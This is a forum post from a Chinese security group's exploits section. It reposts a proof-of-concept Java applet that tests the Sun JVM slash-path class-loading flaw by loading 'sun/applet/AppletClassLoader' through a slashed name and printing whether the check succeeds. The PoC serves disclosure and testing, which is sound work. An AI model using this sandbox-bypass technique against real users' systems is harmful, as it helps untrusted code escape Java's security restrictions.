Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6825
精华: 834
积分: 36073
阅读权限: 255
性别: 男
来自: 中国
在线时间: 590 小时
注册时间: 2004-6-25
最后登录: 2008-10-6

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-11-28 23:21 只看该作者

Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability

文章作者：alla@scanit.be

复制内容到剪贴板

代码:

The following proof-of-concept code has been made available by Alla Bezroutchko <[email]alla@scanit.be[/email]>: 



import java.applet.Applet; 

import java.awt.Graphics; 

import java.lang.Class; 

import java.security.AccessControlException; 



public class Simple extends Applet { 



StringBuffer buffer; 



public void init() { 

buffer = new StringBuffer(); 

} 



public void start() { 

ClassLoader cl = this.getClass().getClassLoader(); 

try { 

Class cla = 

cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes 

addItem("No exception in loadClass. Vulnerable!"); 

} catch (ClassNotFoundException e) { 

addItem("ClassNotFoundException in loadClass - " + e); 

} catch (AccessControlException e) { 

addItem("AccessControlException in loadClass - Not 

Vulnerable!"); 

} 



} 



void addItem(String newWord) { 

System.out.println(newWord); 

buffer.append(newWord); 

repaint(); 

} 



public void paint(Graphics g) { 

//Draw a Rectangle around the applet&#39;s display area. 

g.drawRect(0, 0, size().width - 1, size().height - 1); 



//Draw the current string inside the rectangle. 

g.drawString(buffer.toString(), 5, 15); 

} 

}

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability